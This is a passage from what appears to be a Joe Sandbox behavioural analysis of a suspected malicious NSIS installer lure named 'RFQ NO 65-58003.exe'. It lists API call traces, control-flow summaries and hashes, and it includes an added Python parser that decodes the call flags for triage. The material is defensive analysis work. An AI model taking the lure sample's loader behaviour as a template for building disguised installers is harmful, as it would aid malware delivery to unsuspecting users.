                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsm1096.tmp\
                                                              • API String ID: 2531174081-197708713
                                                              • Opcode ID: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
                                                              • Instruction ID: a3987805c55db6f4a015f8fdfae83c311b34e51693a8fcc51f5c24f156ed4de6
                                                              • Opcode Fuzzy Hash: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
                                                              • Instruction Fuzzy Hash: A3218C71900518BBCB119F95ED84ACFBFB8EF45350F50807AF904B62A0C3B98A91DF68

                                                               Control-flow Graph (rendered graph, legend Executed / Not Executed; image not reproduced, node data summarised): function 405840. Blocks with API calls: 405840-40588b CreateDirectoryW; 405891-40589e GetLastError; 4058a0-4058b4 SetFileSecurityW; 4058b6 GetLastError.
                                                              APIs
                                                              • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405883
                                                              • GetLastError.KERNEL32 ref: 00405897
                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004058AC
                                                              • GetLastError.KERNEL32 ref: 004058B6
                                                              Strings
                                                              • C:\Users\user\Desktop, xrefs: 00405840
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405866
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                              • API String ID: 3449924974-1229045261
                                                              • Opcode ID: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
                                                              • Instruction ID: cbd092c4ebd5e7b47652c6b2ce971f8280a433404df7830fbb595f789125ae90
                                                              • Opcode Fuzzy Hash: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
                                                              • Instruction Fuzzy Hash: 43011A72D00619DAEF10EFA0C9447EFBBB8EF04344F00803AD944B6280E7789614CF99

                                                              Control-flow Graph (basic blocks and edges, recovered from the flattened graph dump)
                                                              • Node 642: 40657c-40659c GetSystemDirectoryW
                                                              • Node 643: 4065a0-4065a2
                                                              • Node 644: 40659e
                                                              • Node 645: 4065b3-4065b5
                                                              • Node 646: 4065a4-4065ad
                                                              • Node 647: 4065af-4065b1
                                                              • Node 648: 4065b6-4065e9 wsprintfW LoadLibraryExW
                                                              • Edges: 642->643, 642->644, 643->645, 643->646, 644->643, 645->648, 646->645, 646->647, 647->648
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406593
                                                              • wsprintfW.USER32 ref: 004065CE
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004065E2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                              • String ID: %s%S.dll$UXTHEME$\
                                                              • API String ID: 2200240437-1946221925
                                                              • Opcode ID: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
                                                              • Instruction ID: 5ba2db083709ae0eaf9cf6759a8f1877d4d75d4363d7664b3b34a8d65426c280
                                                              • Opcode Fuzzy Hash: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
                                                              • Instruction Fuzzy Hash: 4AF0F670910219FADF10AB64EE0EF9B366CAB00304F50403AA546F11D0EB7CDA25CBA8

                                                              Control-flow Graph (basic blocks and edges, recovered from the flattened graph dump)
                                                              • Node 649: 405e16-405e22
                                                              • Node 650: 405e23-405e57 GetTickCount GetTempFileNameW
                                                              • Node 651: 405e66-405e68
                                                              • Node 652: 405e59-405e5b
                                                              • Node 653: 405e60-405e63
                                                              • Node 654: 405e5d
                                                              • Edges: 649->650, 650->651, 650->652, 651->653, 652->650, 652->654, 654->653
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00405E34
                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00403448,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405E4F
                                                              Strings
                                                              • "C:\Users\user\Desktop\RFQ NO 65-58003.exe", xrefs: 00405E16
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E1B
                                                              • nsa, xrefs: 00405E23
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CountFileNameTempTick
                                                              • String ID: "C:\Users\user\Desktop\RFQ NO 65-58003.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                              • API String ID: 1716503409-3913368906
                                                              • Opcode ID: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
                                                              • Instruction ID: 4cf6052b0ced346fb1ee4b1f894cf66bb827df7868a0d4c9989a51242fd2e3ec
                                                              • Opcode Fuzzy Hash: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
                                                              • Instruction Fuzzy Hash: 9BF09076700608FBDB008F59DD05A9BBBBDEB95750F10403AFD40F7180E6B09A548B64

                                                              Control-flow Graph (basic blocks and edges, recovered from the flattened graph dump)
                                                              • Node 655: 405cce-405ce9 call 406212 call 405c71
                                                              • Node 660: 405ceb-405ced
                                                              • Node 661: 405cef-405cfc call 4064a6
                                                              • Node 662: 405d47-405d49
                                                              • Node 665: 405d0c-405d10
                                                              • Node 666: 405cfe-405d04
                                                              • Node 667: 405d26-405d2f lstrlenW
                                                              • Node 668: 405d06-405d0a
                                                              • Node 669: 405d31-405d45 call 405bc6 GetFileAttributesW
                                                              • Node 670: 405d12-405d19 call 406555
                                                              • Node 675: 405d20-405d21 call 405c12
                                                              • Node 676: 405d1b-405d1e
                                                              • Edges: 655->660, 655->661, 660->662, 661->665, 661->666, 665->667, 666->660, 666->668, 667->669, 667->670, 668->660, 668->665, 670->675, 670->676, 675->667, 676->660, 676->675
                                                              APIs
                                                                • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
                                                                • Part of subcall function 00405C71: CharNextW.USER32(?,?,00425F30,?,00405CE5,00425F30,00425F30, 4#v.#v,?,76232EE0,00405A23,?,76233420,76232EE0,00000000), ref: 00405C7F
                                                                • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C84
                                                                • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C9C
                                                              • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30, 4#v.#v,?,76232EE0,00405A23,?,76233420,76232EE0,00000000), ref: 00405D27
                                                              • GetFileAttributesW.KERNELBASE(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30, 4#v.#v,?,76232EE0,00405A23,?,76233420,76232EE0), ref: 00405D37
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                              • String ID: 4#v.#v$0_B
                                                              • API String ID: 3248276644-2013401392
                                                              • Opcode ID: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
                                                              • Instruction ID: ff48dfae10af5decf38b12d619470e329e8f167eeffaec785d8039fb28d6ac4e
                                                              • Opcode Fuzzy Hash: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
                                                              • Instruction Fuzzy Hash: 6DF04439108F612AE622323A2D08ABF1A14CF8236474A423FF851B12D1CB3C8D43DC6E

                                                              Control-flow Graph (basic blocks and edges, recovered from the flattened graph dump)
                                                              • Node 678: 4023ea-402430 call 402d48 call 402c53 * 2 RegCreateKeyExW
                                                              • Node 685: 402436-40243e
                                                              • Node 686: 402adb-402aea
                                                              • Node 688: 402440-40244d call 402c53 lstrlenW
                                                              • Node 689: 402451-402454
                                                              • Node 692: 402456-402467 call 402c31
                                                              • Node 693: 402468-40246b
                                                              • Node 694: 40247c-402490 RegSetValueExW
                                                              • Node 695: 40246d-402477 call 40317b
                                                              • Node 700: 402492
                                                              • Node 701: 402495-402573 RegCloseKey
                                                              • Node 703: 4028a1-4028a8
                                                              • Edges: 678->685, 678->686, 685->688, 685->689, 688->689, 689->692, 689->693, 692->693, 693->694, 693->695, 694->700, 694->701, 695->694, 700->701, 701->686, 701->703, 703->686
                                                              APIs
                                                              • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402428
                                                              • lstrlenW.KERNEL32(0040B5D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402448
                                                              • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5D8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402488
                                                              • RegCloseKey.ADVAPI32(?,?,?,0040B5D8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateValuelstrlen
                                                              • String ID:
                                                              • API String ID: 1356686001-0
                                                              • Opcode ID: e40e8b1c96886283aa3593c8b640164b0f5af0ed5c68d9aeec9e78129a152cd5
                                                              • Instruction ID: 4be5953a60dfee5a88bc6a75bc26a7970e9a4d525f64453ad6d2d9daaf41070d
                                                              • Opcode Fuzzy Hash: e40e8b1c96886283aa3593c8b640164b0f5af0ed5c68d9aeec9e78129a152cd5
                                                              • Instruction Fuzzy Hash: 85216F71E00118BFEB10AFA4DE89DAE7B78EB04358F11843AF505B71D1DBB88D419B68

                                                              Control-flow Graph (basic blocks and edges, recovered from the flattened graph dump)
                                                              • Node 704: 401ed5-401ee6 call 402c53 call 405371 call 4058f2
                                                              • Node 710: 401eeb-401ef0
                                                              • Node 711: 4028a1-4028a8
                                                              • Node 712: 401ef6-401ef9
                                                              • Node 713: 402adb-402aea
                                                              • Node 714: 401f4a-401f53 CloseHandle
                                                              • Node 715: 401efb-401f0b WaitForSingleObject
                                                              • Node 717: 401f1b-401f1d
                                                              • Node 719: 401f0d-401f19 call 406628 WaitForSingleObject
                                                              • Node 720: 401f1f-401f2f GetExitCodeProcess
                                                              • Node 721: 401f31-401f3c call 406159
                                                              • Node 722: 401f3e-401f41
                                                              • Node 725: 401f43
                                                              • Edges: 704->710, 710->711, 710->712, 711->713, 712->714, 712->715, 714->711, 714->713, 715->717, 717->719, 717->720, 719->717, 720->721, 720->722, 721->714, 722->714, 722->725, 725->714
                                                              APIs
                                                                • Part of subcall function 00405371: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                                • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                                • Part of subcall function 00405371: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00402EAD,00402EAD,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000), ref: 004053CC
                                                                • Part of subcall function 00405371: SetWindowTextW.USER32(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\), ref: 004053DE
                                                                • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                                • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                                • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                                • Part of subcall function 004058F2: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 0040591B
                                                                • Part of subcall function 004058F2: CloseHandle.KERNEL32(?), ref: 00405928
                                                              • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401F04
                                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401F19
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00401F26
                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401F4D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                              • String ID:
                                                              • API String ID: 3585118688-0
                                                              • Opcode ID: cf6480494dd600882fe39f06b9bc442e246b080cf3c892367169cc4d6b27fe94
                                                              • Instruction ID: a49aa3197bbdededf4fd909b386d72e1103700f3deb01b848309097317d3e37e
                                                              • Opcode Fuzzy Hash: cf6480494dd600882fe39f06b9bc442e246b080cf3c892367169cc4d6b27fe94
                                                              • Instruction Fuzzy Hash: C411C431A00109EBCF10AFA0DD84ADD7BB6EF04344F20807BF502B61E1C7B94992DB5A
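The "APIs" lines in these function records all follow one layout: a bullet, an optional "Part of subcall function <addr>:" prefix, API.MODULE(args) and a "ref:" address. The flag arguments in them are printed as bare hex and are easy to skim past, yet they carry the triage-relevant detail of this outer layer (the "NSIS Error" string and the nsm1096.tmp directory above mark it as an NSIS installer stub): SetFileSecurityW is called with mask 80000007, LoadLibraryExW with flag 00000008 and CreateProcessW with creation flag 04000000. The Python below is an added example, not part of the Joe Sandbox report or its tooling; it parses API lines copied from this page (a constructed fixture) and decodes those arguments with the documented Win32 constant values. The flag tables, argument positions and the findings() heuristics are my own additions.

```python
"""Parse Joe Sandbox "APIs" trace lines and decode flag arguments (added example)."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed fixture: API lines copied from the function records on this page.
SAMPLE = r"""
• CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405883
• GetLastError.KERNEL32 ref: 00405897
• SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004058AC
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406593
• LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004065E2
• GetTempFileNameW.KERNELBASE(?,?,00000000,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00403448), ref: 00405E4F
  • Part of subcall function 004058F2: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 0040591B
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Win32 bit-flag tables (documented constant values) for the 0-based argument
# positions that carry them; limited to the flags relevant to these records.
SECURITY_INFORMATION = {0x1: "OWNER", 0x2: "GROUP", 0x4: "DACL", 0x8: "SACL",
                        0x80000000: "PROTECTED_DACL"}
LOAD_LIBRARY_FLAGS = {0x1: "DONT_RESOLVE_DLL_REFERENCES",
                      0x8: "LOAD_WITH_ALTERED_SEARCH_PATH",
                      0x800: "LOAD_LIBRARY_SEARCH_SYSTEM32"}
CREATE_PROCESS_FLAGS = {0x4: "CREATE_SUSPENDED", 0x200: "CREATE_NEW_PROCESS_GROUP",
                        0x04000000: "CREATE_DEFAULT_ERROR_MODE",
                        0x08000000: "CREATE_NO_WINDOW"}
FLAG_ARGS = {("SetFileSecurityW", 1): SECURITY_INFORMATION,   # SecurityInformation
             ("LoadLibraryExW", 2): LOAD_LIBRARY_FLAGS,        # dwFlags
             ("CreateProcessW", 5): CREATE_PROCESS_FLAGS}      # dwCreationFlags


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int                              # call-site address from "ref:"
    subcall: Optional[int] = None         # address after "Part of subcall function"
    flags: dict = field(default_factory=dict)   # arg index -> decoded flag names


def split_args(text: str) -> list:
    """Split on commas, except inside double quotes (quoted paths may hold commas)."""
    out, cur, quoted = [], [], False
    for ch in text:
        if ch == '"':
            quoted = not quoted
        elif ch == "," and not quoted:
            out.append("".join(cur))
            cur = []
            continue
        cur.append(ch)
    out.append("".join(cur))
    return out


def as_int(arg: str) -> Optional[int]:
    """Joe Sandbox prints numeric args as bare hex; '?' and strings give None."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{1,8}", arg) else None


def decode_flags(value: int, table: dict) -> list:
    names = [name for bit, name in sorted(table.items()) if value & bit]
    known = 0
    for bit in table:
        known |= bit
    if value & ~known:
        names.append(hex(value & ~known))   # bits this table does not name
    return names


def parse_trace(text: str) -> list:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = split_args(m["args"]) if m["args"] is not None else []
        call = ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
                       int(m["sub"], 16) if m["sub"] else None)
        for (api, idx), table in FLAG_ARGS.items():
            if call.api == api and idx < len(args):
                value = as_int(args[idx])
                if value is not None:
                    call.flags[idx] = decode_flags(value, table)
        calls.append(call)
    return calls


def findings(calls: list) -> list:
    """Triage notes derived from the decoded flags and call order (my heuristics)."""
    notes, seen = [], []
    for c in calls:
        if c.api == "SetFileSecurityW" and "PROTECTED_DACL" in c.flags.get(1, []) \
                and "CreateDirectoryW" in seen:
            notes.append("protected (non-inheriting) DACL applied after CreateDirectoryW")
        if c.api == "LoadLibraryExW" and "LOAD_WITH_ALTERED_SEARCH_PATH" in c.flags.get(2, []) \
                and "GetSystemDirectoryW" in seen:
            notes.append("DLL loaded by explicit system-directory path, not by bare name")
        if c.api == "CreateProcessW":
            notes.append("child process created with " + ",".join(c.flags.get(5, [])))
        seen.append(c.api)
    return notes


if __name__ == "__main__":
    parsed = parse_trace(SAMPLE)
    for c in parsed:
        print(f"{c.ref:08X} {c.api}.{c.module} args={len(c.args)} flags={c.flags}")
    print(findings(parsed))
```

Feed it the "APIs" bullets of any record on this page; arguments printed as "?" or as strings are kept verbatim and only hex-looking values are decoded, so a quoted path such as "C:\Users\user\Desktop\RFQ NO 65-58003.exe" survives as a single argument.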
                                                              APIs
                                                              • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,0040379C,?), ref: 0040397B
                                                              • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,0040379C,?), ref: 0040398F
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040396E
                                                              • C:\Users\user\AppData\Local\Temp\nsm1096.tmp\, xrefs: 0040399F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsm1096.tmp\
                                                              • API String ID: 2962429428-2408394559
                                                              • Opcode ID: 876b688c588afe5773e64c7bbc1298244ac35c0ab5ac1cb34d6cbf52c35d91ec
                                                              • Instruction ID: b4aeda79ce9169ff0691def1b455dd989f45c243b0b2f58971613af12f624ab5
                                                              • Opcode Fuzzy Hash: 876b688c588afe5773e64c7bbc1298244ac35c0ab5ac1cb34d6cbf52c35d91ec
                                                              • Instruction Fuzzy Hash: 07E02CB080070492C130AF3CAE4D8853A285F4133A720432BF038F20F0C7788AAB0EA9
                                                              APIs
                                                                • Part of subcall function 00405C71: CharNextW.USER32(?,?,00425F30,?,00405CE5,00425F30,00425F30, 4#v.#v,?,76232EE0,00405A23,?,76233420,76232EE0,00000000), ref: 00405C7F
                                                                • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C84
